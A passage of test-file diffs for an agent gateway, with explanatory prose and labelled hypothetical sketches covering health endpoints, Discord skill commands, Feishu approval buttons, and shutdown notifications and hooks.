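Calling `stub._running_agent_count()` then counts the stub's single agent. This lets a test exercise real method bodies without constructing the full object.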
+53
@@ -220,6 +220,7 @@ def _create_app(adapter: APIServerAdapter) -> web.Application:
app = web.Application(middlewares=mws)
app["api_server_adapter"] = adapter
app.router.add_get("/health", adapter._handle_health)
app.router.add_get("/health/detailed", adapter._handle_health_detailed)
app.router.add_get("/v1/health", adapter._handle_health)
app.router.add_get("/v1/models", adapter._handle_models)
app.router.add_post("/v1/chat/completions", adapter._handle_chat_completions)
@@ -277,6 +278,58 @@ class TestHealthEndpoint:
assert data["platform"] == "hermes-agent"
# ---------------------------------------------------------------------------
# /health/detailed endpoint
# ---------------------------------------------------------------------------
class TestHealthDetailedEndpoint:
@pytest.mark.asyncio
async def test_health_detailed_returns_ok(self, adapter):
"""GET /health/detailed returns status, platform, and runtime fields."""
app = _create_app(adapter)
with patch("gateway.status.read_runtime_status", return_value={
"gateway_state": "running",
"platforms": {"telegram": {"state": "connected"}},
"active_agents": 2,
"exit_reason": None,
"updated_at": "2026-04-14T00:00:00Z",
}):
async with TestClient(TestServer(app)) as cli:
resp = await cli.get("/health/detailed")
assert resp.status == 200
data = await resp.json()
assert data["status"] == "ok"
assert data["platform"] == "hermes-agent"
assert data["gateway_state"] == "running"
assert data["platforms"] == {"telegram": {"state": "connected"}}
assert data["active_agents"] == 2
assert isinstance(data["pid"], int)
assert "updated_at" in data
@pytest.mark.asyncio
async def test_health_detailed_no_runtime_status(self, adapter):
"""When gateway_state.json is missing, fields are None."""
app = _create_app(adapter)
with patch("gateway.status.read_runtime_status", return_value=None):
async with TestClient(TestServer(app)) as cli:
resp = await cli.get("/health/detailed")
assert resp.status == 200
data = await resp.json()
assert data["status"] == "ok"
assert data["gateway_state"] is None
assert data["platforms"] == {}
@pytest.mark.asyncio
async def test_health_detailed_does_not_require_auth(self, auth_adapter):
"""Health detailed endpoint should be accessible without auth, like /health."""
app = _create_app(auth_adapter)
with patch("gateway.status.read_runtime_status", return_value=None):
async with TestClient(TestServer(app)) as cli:
resp = await cli.get("/health/detailed")
assert resp.status == 200
# ---------------------------------------------------------------------------
# /v1/models endpoint
# ---------------------------------------------------------------------------
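The `/health/detailed` tests fix the response shape. `status` and `platform` are always present, and the runtime fields come from `read_runtime_status()`. When the status file is missing, `gateway_state` is `None` and `platforms` is an empty map. Below is a pure-function sketch of that merge. `build_detailed_health` is a hypothetical name. Reporting `os.getpid()` for `pid` and passing `exit_reason` through unchanged are both assumptions, since the tests only check that `pid` is an `int`.

```python
import os
from typing import Any, Optional


def build_detailed_health(runtime: Optional[dict[str, Any]]) -> dict[str, Any]:
    """Merge a runtime-status dict (or None when the file is absent) into a payload."""
    runtime = runtime or {}
    return {
        "status": "ok",
        "platform": "hermes-agent",
        "gateway_state": runtime.get("gateway_state"),  # None if status is missing
        "platforms": runtime.get("platforms") or {},    # never None, per the tests
        "active_agents": runtime.get("active_agents"),
        "exit_reason": runtime.get("exit_reason"),
        "updated_at": runtime.get("updated_at"),
        "pid": os.getpid(),                              # assumed source of the pid
    }
```

Keeping the merge free of I/O lets it be unit-tested without an aiohttp test server.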
@@ -19,10 +19,34 @@ def _ensure_discord_mock():
discord_mod.Thread = type("Thread", (), {})
discord_mod.ForumChannel = type("ForumChannel", (), {})
discord_mod.Interaction = object
# Lightweight mock for app_commands.Group and Command used by
# _register_skill_group.
class _FakeGroup:
def __init__(self, *, name, description, parent=None):
self.name = name
self.description = description
self.parent = parent
self._children: dict[str, object] = {}
if parent is not None:
parent.add_command(self)
def add_command(self, cmd):
self._children[cmd.name] = cmd
class _FakeCommand:
def __init__(self, *, name, description, callback, parent=None):
self.name = name
self.description = description
self.callback = callback
self.parent = parent
discord_mod.app_commands = SimpleNamespace(
describe=lambda **kwargs: (lambda fn: fn),
choices=lambda **kwargs: (lambda fn: fn),
Choice=lambda **kwargs: SimpleNamespace(**kwargs),
Group=_FakeGroup,
Command=_FakeCommand,
)
ext_mod = MagicMock()
@@ -51,6 +75,12 @@ class FakeTree:
return decorator
def add_command(self, cmd):
self.commands[cmd.name] = cmd
def get_commands(self):
return [SimpleNamespace(name=n) for n in self.commands]
@pytest.fixture
def adapter():
@@ -498,3 +528,79 @@ def test_discord_auto_thread_config_bridge(monkeypatch, tmp_path):
import os
assert os.getenv("DISCORD_AUTO_THREAD") == "true"
# ------------------------------------------------------------------
# /skill group registration
# ------------------------------------------------------------------
def test_register_skill_group_creates_group(adapter):
"""_register_skill_group should register a '/skill' Group on the tree."""
mock_categories = {
"creative": [
("ascii-art", "Generate ASCII art", "/ascii-art"),
("excalidraw", "Hand-drawn diagrams", "/excalidraw"),
],
"media": [
("gif-search", "Search for GIFs", "/gif-search"),
],
}
mock_uncategorized = [
("dogfood", "Exploratory QA testing", "/dogfood"),
]
with patch(
"hermes_cli.commands.discord_skill_commands_by_category",
return_value=(mock_categories, mock_uncategorized, 0),
):
adapter._register_slash_commands()
tree = adapter._client.tree
assert "skill" in tree.commands, "Expected /skill group to be registered"
skill_group = tree.commands["skill"]
assert skill_group.name == "skill"
# Should have 2 category subgroups + 1 uncategorized subcommand
children = skill_group._children
assert "creative" in children
assert "media" in children
assert "dogfood" in children
# Category groups should have their skills
assert "ascii-art" in children["creative"]._children
assert "excalidraw" in children["creative"]._children
assert "gif-search" in children["media"]._children
def test_register_skill_group_empty_skills_no_group(adapter):
"""No /skill group should be added when there are zero skills."""
with patch(
"hermes_cli.commands.discord_skill_commands_by_category",
return_value=({}, [], 0),
):
adapter._register_slash_commands()
tree = adapter._client.tree
assert "skill" not in tree.commands
def test_register_skill_group_handler_dispatches_command(adapter):
"""Skill subcommand handlers should dispatch the correct /cmd-key text."""
mock_categories = {
"media": [
("gif-search", "Search for GIFs", "/gif-search"),
],
}
with patch(
"hermes_cli.commands.discord_skill_commands_by_category",
return_value=(mock_categories, [], 0),
):
adapter._register_slash_commands()
skill_group = adapter._client.tree.commands["skill"]
media_group = skill_group._children["media"]
gif_cmd = media_group._children["gif-search"]
assert gif_cmd.callback is not None
# The callback name should reflect the skill
assert "gif_search" in gif_cmd.callback.__name__
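The `/skill` tests mock `discord_skill_commands_by_category` so that it returns a category-to-skills mapping, an uncategorized list, and a trailing integer. According to the commit message, the category is the top-level folder under `skills/`, so `mlops/training/axolotl` files under `mlops`. A skill placed directly under `skills/` is uncategorized. Discord also caps each level at 25 entries. Below is a sketch of that grouping over directory paths relative to the skills root. `group_skills_by_category` is hypothetical. Reading the trailing integer as a count of dropped skills, and giving categories priority over uncategorized skills for the 25 slots, are both assumptions.

```python
from collections import defaultdict
from pathlib import PurePosixPath

MAX_CHILDREN = 25  # Discord's per-level limit on subcommands / subcommand groups


def group_skills_by_category(skill_dirs: list[str]):
    """Return (categories, uncategorized, dropped) for a /skill command tree."""
    categories: dict[str, list[str]] = defaultdict(list)
    uncategorized: list[str] = []
    for rel in sorted(skill_dirs):
        parts = PurePosixPath(rel).parts
        if len(parts) == 1:
            uncategorized.append(parts[0])           # skills/dogfood/
        else:
            categories[parts[0]].append(parts[-1])   # top-level folder is the category

    dropped = 0
    kept: dict[str, list[str]] = {}
    slots = MAX_CHILDREN  # groups and direct subcommands share the top level
    for name in sorted(categories):
        skills = categories[name]
        if slots == 0:
            dropped += len(skills)
            continue
        kept[name] = skills[:MAX_CHILDREN]
        dropped += len(skills) - len(kept[name])
        slots -= 1
    kept_uncat = uncategorized[:slots]
    dropped += len(uncategorized) - len(kept_uncat)
    return kept, kept_uncat, dropped
```

For example, `["creative/ascii-art", "mlops/training/axolotl", "dogfood"]` yields two categories and one uncategorized skill, with nothing dropped.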
+143 -131
@@ -1,12 +1,11 @@
"""Tests for Feishu interactive card approval buttons."""
import asyncio
import importlib.util
import json
import os
import sys
from pathlib import Path
from types import SimpleNamespace
from unittest.mock import AsyncMock, MagicMock, Mock, patch
from unittest.mock import AsyncMock, MagicMock, patch
import pytest
@@ -23,14 +22,14 @@ if _repo not in sys.path:
# ---------------------------------------------------------------------------
def _ensure_feishu_mocks():
"""Provide stubs for lark-oapi / aiohttp.web so the import succeeds."""
if "lark_oapi" not in sys.modules:
if importlib.util.find_spec("lark_oapi") is None and "lark_oapi" not in sys.modules:
mod = MagicMock()
for name in (
"lark_oapi", "lark_oapi.api.im.v1",
"lark_oapi.event", "lark_oapi.event.callback_type",
):
sys.modules.setdefault(name, mod)
if "aiohttp" not in sys.modules:
if importlib.util.find_spec("aiohttp") is None and "aiohttp" not in sys.modules:
aio = MagicMock()
sys.modules.setdefault("aiohttp", aio)
sys.modules.setdefault("aiohttp.web", aio.web)
@@ -39,6 +38,7 @@ def _ensure_feishu_mocks():
_ensure_feishu_mocks()
from gateway.config import PlatformConfig
import gateway.platforms.feishu as feishu_module
from gateway.platforms.feishu import FeishuAdapter
@@ -74,6 +74,12 @@ def _make_card_action_data(
)
def _close_submitted_coro(coro, _loop):
"""Close scheduled coroutines in sync-handler tests to avoid unawaited warnings."""
coro.close()
return SimpleNamespace(add_done_callback=lambda *_args, **_kwargs: None)
# ===========================================================================
# send_exec_approval — interactive card with buttons
# ===========================================================================
@@ -203,14 +209,14 @@ class TestFeishuExecApproval:
# ===========================================================================
# _handle_card_action_event — approval button clicks
# _resolve_approval — approval state pop + gateway resolution
# ===========================================================================
class TestFeishuApprovalCallback:
"""Test the approval intercept in _handle_card_action_event."""
class TestResolveApproval:
"""Test _resolve_approval pops state and calls resolve_gateway_approval."""
@pytest.mark.asyncio
async def test_resolves_approval_on_click(self):
async def test_resolves_once(self):
adapter = _make_adapter()
adapter._approval_state[1] = {
"session_key": "agent:main:feishu:group:oc_12345",
@@ -218,28 +224,14 @@ class TestFeishuApprovalCallback:
"chat_id": "oc_12345",
}
data = _make_card_action_data(
action_value={"hermes_action": "approve_once", "approval_id": 1},
)
with (
patch.object(
adapter, "_resolve_sender_profile", new_callable=AsyncMock,
return_value={"user_id": "ou_user1", "user_name": "Norbert", "user_id_alt": None},
),
patch.object(adapter, "_update_approval_card", new_callable=AsyncMock) as mock_update,
patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve,
):
await adapter._handle_card_action_event(data)
with patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve:
await adapter._resolve_approval(1, "once", "Norbert")
mock_resolve.assert_called_once_with("agent:main:feishu:group:oc_12345", "once")
mock_update.assert_called_once_with("msg_001", "Approved once", "Norbert", "once")
# State should be cleaned up
assert 1 not in adapter._approval_state
@pytest.mark.asyncio
async def test_deny_button(self):
async def test_resolves_deny(self):
adapter = _make_adapter()
adapter._approval_state[2] = {
"session_key": "some-session",
@@ -247,26 +239,13 @@ class TestFeishuApprovalCallback:
"chat_id": "oc_12345",
}
data = _make_card_action_data(
action_value={"hermes_action": "deny", "approval_id": 2},
token="tok_deny",
)
with (
patch.object(
adapter, "_resolve_sender_profile", new_callable=AsyncMock,
return_value={"user_id": "ou_alice", "user_name": "Alice", "user_id_alt": None},
),
patch.object(adapter, "_update_approval_card", new_callable=AsyncMock) as mock_update,
patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve,
):
await adapter._handle_card_action_event(data)
with patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve:
await adapter._resolve_approval(2, "deny", "Alice")
mock_resolve.assert_called_once_with("some-session", "deny")
mock_update.assert_called_once_with("msg_002", "Denied", "Alice", "deny")
@pytest.mark.asyncio
async def test_session_approval(self):
async def test_resolves_session(self):
adapter = _make_adapter()
adapter._approval_state[3] = {
"session_key": "sess-3",
@@ -274,26 +253,13 @@ class TestFeishuApprovalCallback:
"chat_id": "oc_99",
}
data = _make_card_action_data(
action_value={"hermes_action": "approve_session", "approval_id": 3},
token="tok_ses",
)
with (
patch.object(
adapter, "_resolve_sender_profile", new_callable=AsyncMock,
return_value={"user_id": "ou_u", "user_name": "Bob", "user_id_alt": None},
),
patch.object(adapter, "_update_approval_card", new_callable=AsyncMock) as mock_update,
patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve,
):
await adapter._handle_card_action_event(data)
with patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve:
await adapter._resolve_approval(3, "session", "Bob")
mock_resolve.assert_called_once_with("sess-3", "session")
mock_update.assert_called_once_with("msg_003", "Approved for session", "Bob", "session")
@pytest.mark.asyncio
async def test_always_approval(self):
async def test_resolves_always(self):
adapter = _make_adapter()
adapter._approval_state[4] = {
"session_key": "sess-4",
@@ -301,42 +267,29 @@ class TestFeishuApprovalCallback:
"chat_id": "oc_55",
}
data = _make_card_action_data(
action_value={"hermes_action": "approve_always", "approval_id": 4},
token="tok_alw",
)
with (
patch.object(
adapter, "_resolve_sender_profile", new_callable=AsyncMock,
return_value={"user_id": "ou_u", "user_name": "Carol", "user_id_alt": None},
),
patch.object(adapter, "_update_approval_card", new_callable=AsyncMock),
patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve,
):
await adapter._handle_card_action_event(data)
with patch("tools.approval.resolve_gateway_approval", return_value=1) as mock_resolve:
await adapter._resolve_approval(4, "always", "Carol")
mock_resolve.assert_called_once_with("sess-4", "always")
@pytest.mark.asyncio
async def test_already_resolved_drops_silently(self):
adapter = _make_adapter()
# No state for approval_id 99 — already resolved
data = _make_card_action_data(
action_value={"hermes_action": "approve_once", "approval_id": 99},
token="tok_gone",
)
with patch("tools.approval.resolve_gateway_approval") as mock_resolve:
await adapter._handle_card_action_event(data)
await adapter._resolve_approval(99, "once", "Nobody")
# Should NOT resolve — already handled
mock_resolve.assert_not_called()
# ===========================================================================
# _handle_card_action_event — non-approval card actions
# ===========================================================================
class TestNonApprovalCardAction:
"""Non-approval card actions should still route as synthetic commands."""
@pytest.mark.asyncio
async def test_non_approval_actions_route_normally(self):
"""Non-approval card actions should still become synthetic commands."""
async def test_routes_as_synthetic_command(self):
adapter = _make_adapter()
data = _make_card_action_data(
@@ -351,82 +304,141 @@ class TestFeishuApprovalCallback:
),
patch.object(adapter, "get_chat_info", new_callable=AsyncMock, return_value={"name": "Test Chat"}),
patch.object(adapter, "_handle_message_with_guards", new_callable=AsyncMock) as mock_handle,
patch("tools.approval.resolve_gateway_approval") as mock_resolve,
):
await adapter._handle_card_action_event(data)
# Should NOT resolve any approval
mock_resolve.assert_not_called()
# Should have routed as synthetic command
mock_handle.assert_called_once()
event = mock_handle.call_args[0][0]
assert "/card button" in event.text
# ===========================================================================
# _update_approval_card — card replacement after resolution
# _on_card_action_trigger — inline card response for approval actions
# ===========================================================================
class TestFeishuUpdateApprovalCard:
"""Test the card update after approval resolution."""
class _FakeCallBackCard:
def __init__(self):
self.type = None
self.data = None
@pytest.mark.asyncio
async def test_updates_card_on_approve(self):
class _FakeP2Response:
def __init__(self):
self.card = None
@pytest.fixture(autouse=False)
def _patch_callback_card_types(monkeypatch):
"""Provide real-ish P2CardActionTriggerResponse / CallBackCard for tests."""
monkeypatch.setattr(feishu_module, "P2CardActionTriggerResponse", _FakeP2Response)
monkeypatch.setattr(feishu_module, "CallBackCard", _FakeCallBackCard)
class TestCardActionCallbackResponse:
"""Test that _on_card_action_trigger returns updated card inline."""
def test_drops_action_when_loop_not_ready(self, _patch_callback_card_types):
adapter = _make_adapter()
adapter._loop = None
data = _make_card_action_data({"hermes_action": "approve_once", "approval_id": 1})
mock_update = AsyncMock()
adapter._client.im.v1.message.update = MagicMock()
with patch("asyncio.run_coroutine_threadsafe") as mock_submit:
response = adapter._on_card_action_trigger(data)
with patch("asyncio.to_thread", new_callable=AsyncMock) as mock_thread:
await adapter._update_approval_card(
"msg_001", "Approved once", "Norbert", "once"
)
assert response is not None
assert response.card is None
mock_submit.assert_not_called()
mock_thread.assert_called_once()
# Verify the update request was built
call_args = mock_thread.call_args
assert call_args[0][0] == adapter._client.im.v1.message.update
@pytest.mark.asyncio
async def test_updates_card_on_deny(self):
def test_returns_card_for_approve_action(self, _patch_callback_card_types):
adapter = _make_adapter()
adapter._loop = MagicMock()
adapter._loop.is_closed = MagicMock(return_value=False)
data = _make_card_action_data(
{"hermes_action": "approve_once", "approval_id": 1},
open_id="ou_bob",
)
adapter._sender_name_cache["ou_bob"] = ("Bob", 9999999999)
with patch("asyncio.to_thread", new_callable=AsyncMock) as mock_thread:
await adapter._update_approval_card(
"msg_002", "Denied", "Alice", "deny"
)
with patch("asyncio.run_coroutine_threadsafe", side_effect=_close_submitted_coro):
response = adapter._on_card_action_trigger(data)
mock_thread.assert_called_once()
assert response is not None
assert response.card is not None
assert response.card.type == "raw"
card = response.card.data
assert card["header"]["template"] == "green"
assert "Approved once" in card["header"]["title"]["content"]
assert "Bob" in card["elements"][0]["content"]
@pytest.mark.asyncio
async def test_skips_update_when_not_connected(self):
def test_returns_card_for_deny_action(self, _patch_callback_card_types):
adapter = _make_adapter()
adapter._client = None
adapter._loop = MagicMock()
adapter._loop.is_closed = MagicMock(return_value=False)
data = _make_card_action_data(
{"hermes_action": "deny", "approval_id": 2},
)
with patch("asyncio.to_thread", new_callable=AsyncMock) as mock_thread:
await adapter._update_approval_card(
"msg_001", "Approved", "Bob", "once"
)
with patch("asyncio.run_coroutine_threadsafe", side_effect=_close_submitted_coro):
response = adapter._on_card_action_trigger(data)
mock_thread.assert_not_called()
assert response.card is not None
card = response.card.data
assert card["header"]["template"] == "red"
assert "Denied" in card["header"]["title"]["content"]
@pytest.mark.asyncio
async def test_skips_update_when_no_message_id(self):
def test_ignores_missing_approval_id(self, _patch_callback_card_types):
adapter = _make_adapter()
adapter._loop = MagicMock()
adapter._loop.is_closed = MagicMock(return_value=False)
data = _make_card_action_data({"hermes_action": "approve_once"})
with patch("asyncio.to_thread", new_callable=AsyncMock) as mock_thread:
await adapter._update_approval_card(
"", "Approved", "Bob", "once"
)
with patch("asyncio.run_coroutine_threadsafe") as mock_submit:
response = adapter._on_card_action_trigger(data)
mock_thread.assert_not_called()
assert response is not None
assert response.card is None
mock_submit.assert_not_called()
@pytest.mark.asyncio
async def test_swallows_update_errors(self):
def test_no_card_for_non_approval_action(self, _patch_callback_card_types):
adapter = _make_adapter()
adapter._loop = MagicMock()
adapter._loop.is_closed = MagicMock(return_value=False)
data = _make_card_action_data({"some_other": "value"})
with patch("asyncio.to_thread", new_callable=AsyncMock, side_effect=Exception("API error")):
# Should not raise
await adapter._update_approval_card(
"msg_001", "Approved", "Bob", "once"
)
with patch("asyncio.run_coroutine_threadsafe", side_effect=_close_submitted_coro):
response = adapter._on_card_action_trigger(data)
assert response is not None
assert response.card is None
def test_falls_back_to_open_id_when_name_not_cached(self, _patch_callback_card_types):
adapter = _make_adapter()
adapter._loop = MagicMock()
adapter._loop.is_closed = MagicMock(return_value=False)
data = _make_card_action_data(
{"hermes_action": "approve_session", "approval_id": 3},
open_id="ou_unknown",
)
with patch("asyncio.run_coroutine_threadsafe", side_effect=_close_submitted_coro):
response = adapter._on_card_action_trigger(data)
card = response.card.data
assert "ou_unknown" in card["elements"][0]["content"]
def test_ignores_expired_cached_name(self, _patch_callback_card_types):
adapter = _make_adapter()
adapter._loop = MagicMock()
adapter._loop.is_closed = MagicMock(return_value=False)
data = _make_card_action_data(
{"hermes_action": "approve_once", "approval_id": 4},
open_id="ou_expired",
)
adapter._sender_name_cache["ou_expired"] = ("Old Name", 1)
with patch("asyncio.run_coroutine_threadsafe", side_effect=_close_submitted_coro):
response = adapter._on_card_action_trigger(data)
card = response.card.data
assert "Old Name" not in card["elements"][0]["content"]
assert "ou_expired" in card["elements"][0]["content"]
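Taken together, the rewritten Feishu tests describe two cooperating pieces. First, `_resolve_approval` pops the pending state, so a second click on the same approval is a no-op. Second, `_on_card_action_trigger` answers the callback inline with a replacement card. The card header is green for approvals and red for denials, and the body names the clicker, falling back to the `open_id` when no usable cached name exists. Below is a sketch of that logic on plain dicts. All function names are hypothetical, as are the `"always"` label and the card element `tag` values. It treats the second element of each cache tuple as an expiry timestamp, which is one reading consistent with the tests.

```python
import time
from typing import Callable, Optional

# Labels seen in the tests; the "always" wording is an assumption.
_LABELS = {
    "once": "Approved once",
    "session": "Approved for session",
    "always": "Approved always",
    "deny": "Denied",
}


def resolve_approval(state: dict, approval_id: int, choice: str,
                     resolve: Callable[[str, str], object]) -> bool:
    """Pop pending approval state and resolve it at most once."""
    entry = state.pop(approval_id, None)
    if entry is None:  # already handled (e.g. a double click): drop silently
        return False
    resolve(entry["session_key"], choice)
    return True


def display_name(cache: dict[str, tuple[str, float]], open_id: str,
                 now: Optional[float] = None) -> str:
    """Use a cached (name, expires_at) entry while valid, else the raw open_id."""
    now = time.time() if now is None else now
    cached = cache.get(open_id)
    if cached and cached[1] > now:
        return cached[0]
    return open_id


def build_result_card(choice: str, who: str) -> dict:
    """Minimal card payload mirroring only the fields the tests inspect."""
    label = _LABELS[choice]
    return {
        "header": {
            "template": "red" if choice == "deny" else "green",
            "title": {"tag": "plain_text", "content": label},  # assumed tag
        },
        "elements": [{"tag": "markdown", "content": f"{label} by {who}"}],  # assumed tag
    }
```

Popping before resolving makes the operation idempotent without a separate lock, because the event loop processes one callback at a time.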
+19
@@ -125,6 +125,25 @@ async def test_gateway_stop_service_restart_sets_named_exit_code():
assert runner._exit_code == GATEWAY_SERVICE_RESTART_EXIT_CODE
@pytest.mark.asyncio
async def test_gateway_stop_emits_shutdown_hook_after_drain(monkeypatch):
runner, adapter = make_restart_runner()
adapter.disconnect = AsyncMock()
runner.hooks.emit = AsyncMock()
with patch("gateway.status.remove_pid_file"), patch("gateway.status.write_runtime_status"):
await runner.stop(restart=True, service_restart=True)
runner.hooks.emit.assert_awaited_once_with(
"gateway:shutdown",
{
"restart": True,
"service_restart": True,
"detached_restart": False,
},
)
@pytest.mark.asyncio
async def test_drain_active_agents_throttles_status_updates():
runner, _adapter = make_restart_runner()
+20 -1
@@ -9,7 +9,7 @@ import pytest
from gateway.hooks import HookRegistry
def _create_hook(hooks_dir, hook_name, events, handler_code):
def _create_hook(hooks_dir, hook_name, events, handler_code, *, manifest_extra=""):
"""Helper to create a hook directory with HOOK.yaml and handler.py."""
hook_dir = hooks_dir / hook_name
hook_dir.mkdir(parents=True)
@@ -17,6 +17,7 @@ def _create_hook(hooks_dir, hook_name, events, handler_code):
f"name: {hook_name}\n"
f"description: Test hook\n"
f"events: {events}\n"
f"{manifest_extra}"
)
(hook_dir / "handler.py").write_text(handler_code)
return hook_dir
@@ -112,6 +113,24 @@ class TestDiscoverAndLoad:
assert len(reg.loaded_hooks) == 2
def test_preserves_optional_startup_readiness_metadata(self, tmp_path):
_create_hook(
tmp_path,
"ready-hook",
'["gateway:startup"]',
"def handle(e, c): pass\n",
manifest_extra="startup_readiness:\n id: beam-runtime\n required: false\n",
)
reg = HookRegistry()
with patch("gateway.hooks.HOOKS_DIR", tmp_path), _patch_no_builtins(reg):
reg.discover_and_load()
assert reg.loaded_hooks[0]["startup_readiness"] == {
"id": "beam-runtime",
"required": False,
}
class TestEmit:
@pytest.mark.asyncio
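The new `HookRegistry` test checks that an optional `startup_readiness` block in `HOOK.yaml` survives discovery as `{"id": ..., "required": ...}`. Below is a sketch that normalizes that block from an already-parsed manifest dict. The function name is hypothetical. Two fallbacks are assumptions that the diff does not confirm: using the hook name when `id` is absent, and defaulting `required` to `True`.

```python
from typing import Any, Optional


def parse_startup_readiness(manifest: dict[str, Any], hook_name: str) -> Optional[dict[str, Any]]:
    """Return a normalized startup_readiness entry, or None if the hook declares none."""
    block = manifest.get("startup_readiness")
    if not isinstance(block, dict):
        return None
    return {
        # Assumed fallbacks: reuse the hook name as id; treat checks as required.
        "id": str(block.get("id") or hook_name),
        "required": bool(block.get("required", True)),
    }
```

Returning `None` for hooks without the block keeps readiness tracking opt-in.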
+81
@@ -161,3 +161,84 @@ async def test_launch_detached_restart_command_uses_setsid(monkeypatch):
assert kwargs["start_new_session"] is True
assert kwargs["stdout"] is subprocess.DEVNULL
assert kwargs["stderr"] is subprocess.DEVNULL
# ── Shutdown notification tests ──────────────────────────────────────
@pytest.mark.asyncio
async def test_shutdown_notification_sent_to_active_sessions():
"""Active sessions receive a notification when the gateway starts shutting down."""
runner, adapter = make_restart_runner()
source = make_restart_source(chat_id="999", chat_type="dm")
session_key = f"agent:main:telegram:dm:999"
runner._running_agents[session_key] = MagicMock()
await runner._notify_active_sessions_of_shutdown()
assert len(adapter.sent) == 1
assert "shutting down" in adapter.sent[0]
assert "interrupted" in adapter.sent[0]
@pytest.mark.asyncio
async def test_shutdown_notification_says_restarting_when_restart_requested():
"""When _restart_requested is True, the message says 'restarting' and mentions /retry."""
runner, adapter = make_restart_runner()
runner._restart_requested = True
session_key = "agent:main:telegram:dm:999"
runner._running_agents[session_key] = MagicMock()
await runner._notify_active_sessions_of_shutdown()
assert len(adapter.sent) == 1
assert "restarting" in adapter.sent[0]
assert "/retry" in adapter.sent[0]
@pytest.mark.asyncio
async def test_shutdown_notification_deduplicates_per_chat():
"""Multiple sessions in the same chat only get one notification."""
runner, adapter = make_restart_runner()
# Two sessions (different users) in the same chat
runner._running_agents["agent:main:telegram:group:chat1:u1"] = MagicMock()
runner._running_agents["agent:main:telegram:group:chat1:u2"] = MagicMock()
await runner._notify_active_sessions_of_shutdown()
assert len(adapter.sent) == 1
@pytest.mark.asyncio
async def test_shutdown_notification_skipped_when_no_active_agents():
"""No notification is sent when there are no active agents."""
runner, adapter = make_restart_runner()
await runner._notify_active_sessions_of_shutdown()
assert len(adapter.sent) == 0
@pytest.mark.asyncio
async def test_shutdown_notification_ignores_pending_sentinels():
"""Pending sentinels (not-yet-started agents) don't trigger notifications."""
from gateway.run import _AGENT_PENDING_SENTINEL
runner, adapter = make_restart_runner()
runner._running_agents["agent:main:telegram:dm:999"] = _AGENT_PENDING_SENTINEL
await runner._notify_active_sessions_of_shutdown()
assert len(adapter.sent) == 0
@pytest.mark.asyncio
async def test_shutdown_notification_send_failure_does_not_block():
"""If sending a notification fails, the method still completes."""
runner, adapter = make_restart_runner()
adapter.send = AsyncMock(side_effect=Exception("network error"))
session_key = "agent:main:telegram:dm:999"
runner._running_agents[session_key] = MagicMock()
# Should not raise
await runner._notify_active_sessions_of_shutdown()
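The shutdown-notification tests pin down these behaviours:

- Each chat with a started agent gets exactly one message.
- Pending sentinels are skipped.
- A restart message mentions `/retry`.
- A failed send must not abort the loop.

Below is a sketch of that logic. It assumes session keys are shaped like `agent:main:<platform>:<chat_type>:<chat_id>[:<user>]`, inferred from the keys in the tests. `chats_to_notify`, `notify_shutdown`, `PENDING`, and the message wording are all hypothetical.

```python
import asyncio
from typing import Awaitable, Callable

PENDING = object()  # stand-in for a "not started yet" sentinel


def chats_to_notify(running: dict[str, object], pending: object = PENDING) -> list[tuple[str, str]]:
    """Unique (platform, chat_id) pairs for agents that have actually started."""
    targets: list[tuple[str, str]] = []
    for key, agent in running.items():
        if agent is pending:
            continue
        parts = key.split(":")
        if len(parts) < 5:
            continue  # unexpected key layout; skip rather than guess
        target = (parts[2], parts[4])
        if target not in targets:  # several users in one chat -> one message
            targets.append(target)
    return targets


async def notify_shutdown(running: dict[str, object],
                          send: Callable[[str, str, str], Awaitable[None]],
                          restarting: bool) -> int:
    """Send one notice per chat; return how many sends succeeded."""
    text = (
        "Gateway is restarting; your current task was interrupted. Send /retry once it is back."
        if restarting
        else "Gateway is shutting down; your current task was interrupted."
    )
    sent = 0
    for platform, chat_id in chats_to_notify(running):
        try:
            await send(platform, chat_id, text)
            sent += 1
        except Exception:
            pass  # a failed notification must never block shutdown
    return sent


if __name__ == "__main__":
    async def _print_send(platform: str, chat_id: str, text: str) -> None:
        print(platform, chat_id, text)

    asyncio.run(notify_shutdown({"agent:main:telegram:dm:999": object()}, _print_send, restarting=False))
```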
@@ -132,6 +132,68 @@ async def test_runner_records_connected_platform_state_on_success(monkeypatch, t
assert state["platforms"]["discord"]["error_message"] is None
@pytest.mark.asyncio
async def test_runner_discovers_plugins_before_loading_hooks(monkeypatch, tmp_path):
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
config = GatewayConfig(
platforms={
Platform.DISCORD: PlatformConfig(enabled=True, token="***")
},
sessions_dir=tmp_path / "sessions",
)
runner = GatewayRunner(config)
order: list[str] = []
monkeypatch.setattr(runner, "_create_adapter", lambda platform, platform_config: _SuccessfulAdapter())
monkeypatch.setattr("hermes_cli.plugins.discover_plugins", lambda: order.append("plugins"))
monkeypatch.setattr(runner.hooks, "discover_and_load", lambda: order.append("hooks"))
monkeypatch.setattr(runner.hooks, "emit", AsyncMock())
ok = await runner.start()
assert ok is True
assert order == ["plugins", "hooks"]
@pytest.mark.asyncio
async def test_runner_initializes_startup_checks_before_gateway_startup_emit(monkeypatch, tmp_path):
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
config = GatewayConfig(
platforms={
Platform.DISCORD: PlatformConfig(enabled=True, token="***")
},
sessions_dir=tmp_path / "sessions",
)
runner = GatewayRunner(config)
runner.hooks._loaded_hooks = [
{
"name": "beam-runtime",
"events": ["gateway:startup"],
"path": str(tmp_path / "hook"),
"startup_readiness": {
"id": "beam-runtime",
"required": True,
},
}
]
monkeypatch.setattr(runner, "_create_adapter", lambda platform, platform_config: _SuccessfulAdapter())
monkeypatch.setattr("hermes_cli.plugins.discover_plugins", lambda: None)
monkeypatch.setattr(runner.hooks, "discover_and_load", lambda: None)
async def _assert_checks(event_type, context):
state = read_runtime_status()
assert event_type == "gateway:startup"
assert state["startup_checks"]["beam-runtime"]["state"] == "pending"
assert state["startup_checks"]["beam-runtime"]["required"] is True
monkeypatch.setattr(runner.hooks, "emit", _assert_checks)
ok = await runner.start()
assert ok is True
@pytest.mark.asyncio
async def test_start_gateway_verbosity_imports_redacting_formatter(monkeypatch, tmp_path):
"""Verbosity != None must not crash with NameError on RedactingFormatter (#8044)."""
